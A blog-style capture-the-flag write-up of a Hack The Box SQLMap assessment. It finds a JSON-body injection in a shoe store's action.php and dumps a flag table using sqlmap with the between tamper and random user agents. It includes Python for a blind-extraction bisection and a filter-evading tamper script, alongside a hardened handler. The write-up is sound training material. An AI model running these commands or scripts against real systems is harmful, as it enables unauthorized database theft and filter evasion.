Well here we are, the big test to make sure we understood our SQLMap training. We're given access to a web application with basic protection mechanisms. Use the skills learned in this module to find the SQLi vulnerability with SQLMap and exploit it accordingly. To complete this module, find the flag and submit it here.
Let's dig in.
We visit the site they provide (note: sometimes you'll see the target IP change in my screenshots. That's because I'm a dad and husband and get dragged away from my PC often, so I have to reconnect, and the target comes back on a new address) and get a shoe store. There isn't much to interact with, and I'm not seeing any page that takes an ID or other parameter in the URL, so there's nothing obvious to hand to sqlmap yet.
![](https://static.wixstatic.com/media/b4353b_871c5df6937a44c699796651ee4eac30~mv2.png/v1/fill/w_49,h_23,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_871c5df6937a44c699796651ee4eac30~mv2.png)
After hours of clicking around I finally caught it. Going to the shop and adding an item to the cart pops a message, and if you watch the network traffic (browser dev tools or an intercepting proxy) you'll see the PHP page it calls, action.php, and the data it sends.
![](https://static.wixstatic.com/media/b4353b_370b4c565e104b03a46d13d6d57fd47d~mv2.png/v1/fill/w_49,h_16,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_370b4c565e104b03a46d13d6d57fd47d~mv2.png)
The initial sqlmap run showed some promise but returned no data. After a few more hours of trying to bypass what I assumed was web filtering, it turned out the real problem was that the request body is a JSON document, not form-encoded parameters: I should have copied the raw body of that request instead of the parsed view. sqlmap recognises JSON in --data and injects into its values, but only if you give it the body exactly as the browser sent it (or save the full request from the proxy and pass it with -r).
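To make concrete what sqlmap is doing against that JSON body, here is an added example (mine, not the challenge's code or sqlmap's) of the assumed shape of the handler behind action.php: a version that pastes the JSON id into the query, a hardened version beside it, and the boolean-blind bisection sqlmap uses to pull a value out one request at a time. The SQLite backend, the products rows and the placeholder flag text are all constructed for the example; only the table names come from the page.

```python
import json
import sqlite3

# Constructed stand-in for what sits behind action.php. The page only shows
# the table names sqlmap enumerated; the columns, rows and the SQLite backend
# are assumptions (the real target is almost certainly not SQLite), and the
# flag text is a placeholder.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'runner'), (2, 'trainer'), (3, 'boot');
        CREATE TABLE final_flag (id INTEGER PRIMARY KEY, content TEXT);
        INSERT INTO final_flag VALUES (1, 'placeholder-not-the-real-flag');
    """)
    return db


def action_vulnerable(db, body):
    """Assumed shape of the vulnerable handler: the JSON 'id' value is pasted
    into the query text, so whatever sqlmap puts in that value is executed."""
    pid = json.loads(body)["id"]
    sql = "SELECT name FROM products WHERE id=%s" % pid
    return [row[0] for row in db.execute(sql)]


def action_fixed(db, body):
    """Hardened handler: reject anything that is not an integer, then bind it."""
    pid = json.loads(body)["id"]
    if isinstance(pid, bool) or not isinstance(pid, int):
        raise ValueError("id must be an integer")
    rows = db.execute("SELECT name FROM products WHERE id=?", (pid,))
    return [row[0] for row in rows]


def fixed_rejects(db, body):
    """True if the hardened handler refuses the body."""
    try:
        action_fixed(db, body)
    except ValueError:
        return True
    return False


def infer_string(db, subquery):
    """Boolean-blind extraction of a single-row, single-column subquery result,
    the way sqlmap does it: a bisection per value, one request per step, where
    the only signal is 'row came back' versus 'no row'. Returns the recovered
    string and the number of requests it cost. Time-based blind is the same
    loop, except every true answer additionally waits out the SLEEP delay."""
    requests = 0

    def infer_int(expr, lo=0, hi=255):
        nonlocal requests
        while lo < hi:
            mid = (lo + hi) // 2
            probe = json.dumps({"id": "1 AND (%s)>%d" % (expr, mid)})
            requests += 1
            if action_vulnerable(db, probe):   # row returned: value is above mid
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = infer_int("length((%s))" % subquery)
    chars = [chr(infer_int("unicode(substr((%s),%d,1))" % (subquery, i)))
             for i in range(1, length + 1)]
    return "".join(chars), requests
```

Against the constructed database, infer_string(db, "SELECT content FROM final_flag") returns the placeholder after 240 requests: 8 for the length and 8 per character. That request count is the cost that made the full dump outrun the VPN session, and over a time-based channel every "true" step above also waits out --time-sec before the next one can be sent.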
Either way, the application sat behind some request filtering, so we added --random-agent and a tamper script. The between tamper rewrites the > and = comparisons in sqlmap's payloads into NOT BETWEEN 0 AND ... and BETWEEN x AND x, which keep the same truth value but give a filter keyed on those operators nothing to match. Unfortunately the only technique sqlmap could confirm was time-based blind, so it takes forever: every character is recovered through a series of requests, and each true answer costs a deliberate delay. I set our sqlmap statement up like this:

```bash
sqlmap -u '83.136.252.24:32574/action.php' --data='{"id":1}' --tamper=between --random-agent --batch --dump
```
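What the between tamper actually does to a payload is easier to see in code. This is an added, simplified re-implementation written in sqlmap's tamper-script interface (a tamper(payload, **kwargs) function), not sqlmap's own between.py, plus a check that the rewrite preserves the comparison's truth value using SQLite as a stand-in engine.

```python
import re
import sqlite3


def tamper(payload, **kwargs):
    """sqlmap tamper-script entry point. Rewrites the '>' or '=' comparison
    that ends a boolean payload into its BETWEEN equivalent so a filter that
    keys on those operators has nothing to match:
        A > B  ->  A NOT BETWEEN 0 AND B
        A = B  ->  A BETWEEN B AND B
    Payloads with no such comparison (e.g. a bare SLEEP()) pass through
    untouched, which is why this tamper changes nothing about the technique.
    Simplified re-implementation for illustration, not sqlmap's between.py."""
    if not payload:
        return payload
    # '>' against a number, a quoted string or a simple function call
    out = re.sub(r"\s*>\s*(\d+|'[^']*'|\w+\([^()]*\))",
                 r" NOT BETWEEN 0 AND \1", payload)
    if out == payload:
        # no '>' found: rewrite the '=' that follows the last AND/OR
        out = re.sub(r"(\b(?:AND|OR)\b\s+)([^=]+?)\s*=\s*(\w+)",
                     r"\1\2 BETWEEN \3 AND \3", payload, flags=re.I)
    return out


def same_truth(expr):
    """Evaluate a comparison before and after tampering in SQLite and report
    whether both forms yield the same truth value."""
    db = sqlite3.connect(":memory:")
    before = db.execute("SELECT (%s)" % expr).fetchone()[0]
    after = db.execute("SELECT (%s)" % tamper(expr)).fetchone()[0]
    return bool(before) == bool(after)
```

A script like this goes into sqlmap's tamper/ directory and is selected with --tamper=<name>; sqlmap's real between handles a few more payload shapes than this one. Note that nothing here touches SLEEP() or the timing itself, so a tamper buys you a way past the operator filter, not a faster channel.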
Because it took so long, the VPN timed out before the full database dump finished. A bare --dump with no -D/-T walks every table sqlmap can reach, which is the worst possible choice over a time-based channel, and --threads doesn't help here because sqlmap won't multi-thread time-based retrieval (concurrent delays would corrupt the timing). sqlmap does keep everything it has already retrieved in its session file and resumes from it on the next run, so the interrupted run wasn't wasted, but we decided to break the job into smaller, targeted runs. First a banner grab, plus the current user, the current database, and whether that user is a DBA:

```bash
sqlmap -u 'http://94.237.48.48:51313/action.php' --data='{"id":1}' --tamper=between --random-agent --banner --current-user --current-db --is-dba
```
![](https://static.wixstatic.com/media/b4353b_f3ddde90c7274a128800745d7595ea67~mv2.png/v1/fill/w_110,h_57,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_f3ddde90c7274a128800745d7595ea67~mv2.png)
Next we grab the tables in the production database:

```bash
sqlmap -u 'http://94.237.48.48:51313/action.php' --data='{"id":1}' --tamper=between --random-agent --tables -D production --batch
```

```text
Database: production
[5 tables]
+-------------+
| brands      |
| categories  |
| final_flag  |
| order_items |
| products    |
+-------------+
```
Then we dump only the table of interest, final_flag:

```bash
sqlmap -u 'http://94.237.48.48:51313/action.php' --data='{"id":1}' --tamper=between --random-agent --dump -T final_flag -D production --batch
```

And voilà, we have our flag:

```text
Database: production
Table: final_flag
[1 entry]
+----+--------------------------+
| id | content                  |
+----+--------------------------+
| 1  | HTB{n07_50_h4rd_r16h7?!} |
+----+--------------------------+
```